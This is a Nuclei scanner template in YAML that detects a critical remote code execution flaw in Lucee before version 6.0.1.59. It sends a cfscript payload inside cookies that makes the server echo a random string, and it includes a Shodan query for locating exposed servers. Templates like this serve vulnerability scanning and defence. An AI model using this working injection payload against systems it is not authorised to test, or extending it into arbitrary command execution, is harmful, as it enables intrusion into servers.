29 lines
997 B
YAML
29 lines
997 B
YAML
id: lucee-rce
|
|
|
|
info:
|
|
name: Lucee < 6.0.1.59 - Remote Code Execution
|
|
author: rootxharsh,iamnoooob,pdresearch
|
|
severity: critical
|
|
reference:
|
|
- https://blog.projectdiscovery.io/hello-lucee-let-us-hack-apple-again
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.title:"Lucee"
|
|
verified: true
|
|
tags: lucee,rce,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: CF_CLIENT_=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>'); CF_CLIENT_LUCEE=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>');
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(body, "{{randstr}}")
|
|
- contains(header, "cfid")
|
|
- contains(header, "cftoken")
|
|
condition: and
|
|
# digest: 4a0a0047304502207341748122d2f419b377e3b4bb3fbce5d09bdee89ef2215c2bb034ccedddf4e6022100eb2e2837b5bddec247eeaeeb3a346ab459f5b4070feca8e3a80c34b109115122:922c64590222798bb761d5b6d8e72950 |